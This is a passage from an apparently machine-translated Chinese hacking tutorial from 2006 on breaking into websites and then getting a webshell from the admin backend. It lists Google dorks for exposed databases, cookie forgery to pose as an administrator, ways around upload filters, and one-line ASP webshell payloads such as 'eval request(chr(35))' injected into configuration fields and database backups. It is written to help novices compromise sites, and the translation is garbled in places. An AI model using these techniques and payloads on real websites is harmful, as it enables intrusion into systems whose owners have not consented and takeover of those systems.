10. View directory method: Some websites can disconnect the directory, and you can ask the directory.
EY:http:///shop/admin/
/babyfox/admin/%23bb%23dedsed2s/
In this way, we can find the database, so I don’t need to teach you how to download it.
11. Tool overflow:.asp?NewsID= /?id=18 .asp?id=[This method can obtain a large amount of WEBSHELL]
12. Search engine utilization:
(1).inurl:flasher_list.asp Default database:database/ Backend/manager/
(2). Find the website's management backend address:
site::Management
site::Management <There are many keywords, please look for it yourself>
site::login
(3). Find access database, mssql, mysql connection files
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
My Lord will not do it anymore. . Do it yourself. .
Fraud:
Change your ID to the administrator, and also change the MD5 password to his. You can use the Guilin Veteran Tool to modify COOKIE. I won't talk about this more
14. Take advantage of common vulnerabilities: Rudong.com BBS
You can first use the :dvbbs permission enhancement tool to make yourself a front-end administrator.
THEN, use: Dynamic Net Fixed Top Sticker Tool, find a Fixed Top Sticker, and then obtain COOKIES, you have to do this yourself. We can use WSockExpert to obtain the Cookies/NC package
I won’t do this anymore. There are many online tutorials, so I will take a look at it next.
Tools: dvbbs permission enhancement tool Dongwang fixed top sticker tool
15. There are still some old loopholes. For example, IIS3, 4's view source code, 5's DELETE
I won’t talk about CGI, some old holes in PHP. . Too old. No big use.
three. Get a summary of the top ten webshell tips from the background
Author: Source: Safety China Editor: Yuanye [2006-04-27 09:29] We have summarized and summarized the commonly used methods of obtaining webshells from the background. The general situation is as follows ten aspects...
--------------------------------------------------------------------------------
Key recommendations: Hacker Invasion Examples
Preface
I believe everyone will get a lot of broiler chickens when I upload a loophole online. It can be said that the loophole that makes uploaded files not strictly filtered is obvious to the world. This kind of vulnerability is basically difficult to see now, and it is not ruled out that some small websites still have this vulnerability. During the process of getting the site, we often spent a lot of effort to get the administrator account and password, and successfully entered the background. Although we were still one step away from getting the website webshell at this time, many novices were still turned away because they could not think of a suitable method. Therefore, we have summarized and summarized the commonly used methods of obtaining webshells from the background. The general situation is as follows ten aspects.
Note: How to enter the background is not the scope of this article. I won’t talk about the specific methods, and I rely on everyone to play them. This article refers to various information and information from predecessors, and I would like to express my gratitude here.
1. Upload directly to get webshell
This kind of programs for php and jsp are more common. MolyX BOARD is one of the examples. It directly manages the upload of .php type in the mood icon. Although there is no prompt, it has actually been successful. The uploaded file url should be http://forums/images/smiles/. A while ago, the jsp file can be uploaded directly by the Lianzhong game station and NetEase's jsp system vulnerabilities. The file name is the original file name. The bo-blog background can directly upload the .php file. There are prompts for the uploaded file path. As well as the vulnerabilities that were very popular a year ago (Dongwang 5.0 and 6.0, many early entire station systems), due to the lack of strict filtering and uploading files, users can directly upload the webshell to any writable directory on the website, thereby obtaining the administrator control rights of the website.
2. Add and modify the upload type
Nowadays, many scripting program upload modules do not only allow uploading legal file types, but most systems allow adding upload types. The bbsxp background can add asa AsP type, and the ewewebeditor background can also add asa type. After modification, we can directly upload the webshell with the asa suffix. Another situation is that .asp can be filtered, and the file type of .aspasp can be added to upload and obtain the webshell. In the background of the php system, we can add the upload type of .php.g1f. This is a feature of php. As long as the last one is not a known file type, php will run php.g1f as .php, so that you can successfully get the shell. The method to obtain webshell in the LeadBbs3.14 background is: add asp to the upload type. Note that there is a space behind the asp, and then upload the ASP horse in the front desk. Of course, you also need to add a space behind it!
3. Use the background management function to write to the webshell
The upload vulnerability is basically done, so after we enter the background, we can also write to the webshell by modifying the relevant files. Typical comparisons include dvbbs6.0, leadbbs2.88, etc., which directly modify the configuration file in the background and write files with the suffix asp. Another way to obtain webshell in the LeadBbs3.14 background is: add a new friendly link and write the Ice Fox minimum horse in the website name. You must enter some characters before and after the minimum horse. http:\\Website\inc\IncHtm\ is the shell we want.
4. Use background management to write webshell to configuration files
Use """":"//" and other symbols to construct the configuration file of the minimum horse writing program, joekoe forum, a certain classmate's record, Boiling Outlook News System, COCOON Counter Statistics Program, etc., and there are many php programs. For example, add cnhacker@":eval request(chr (35))// in the management email address, it is webmail="cnhacker@\":eval request(chr(35))//" in the configuration file. Another method is to write cnhacker@"%><%eval request(chr(35))%><%', so that the front and back correspondence will be formed, and the minimum horse will run. <%eval request(chr(35))%> You can use the eval sender of lake2 and the latest 2006 client to connect. It should be noted that when inserting the database, you must choose the former. For example, Dongyi 2005, go to the article center management - top menu settings - other special effects, insert a sentence "%> <%execute request("l")%> <%', save the menu parameters in the top column successfully, we get the address http://website/admin/rootclass_menu_config.asp.
5. Use background database backup and recovery to obtain webshell
The main purpose is to use the "backup database" or "restore database" function of the access database in the background. The "backup database path" and other variables are not filtered, so that any file suffix can be changed to asp, thereby obtaining webshell. The mssql version of the program directly applies the access version code, resulting in the SQL version being still available. You can also back up the website asp file with other suffixes such as .txt file, so that you can view and obtain the web page source code and obtain more program information to increase your chances of obtaining webshells. In actual use, you often encounter when there is no upload function, but there is an asp system running. Use this method to view the source code to obtain the location of its database and create opportunities for the database to insert the Map. The Dynamic Network Forum has an IP address database. In the IP management in the background, you can insert the minimum map and back it up into a .asp file. Let’s talk about the method of breaking up upload detection. Many asp programs will prompt that the file is illegal even after changing the suffix name. They tricked the asp program from detecting the suffix by adding gif89a to the .asp file header to achieve the purpose of uploading. Another type is to open the image file with notepad, paste part of it casually and copy it to the asp * file header, modify the gif suffix and upload it can also break through the detection, and then back up to a .asp file, and successfully get the webshell.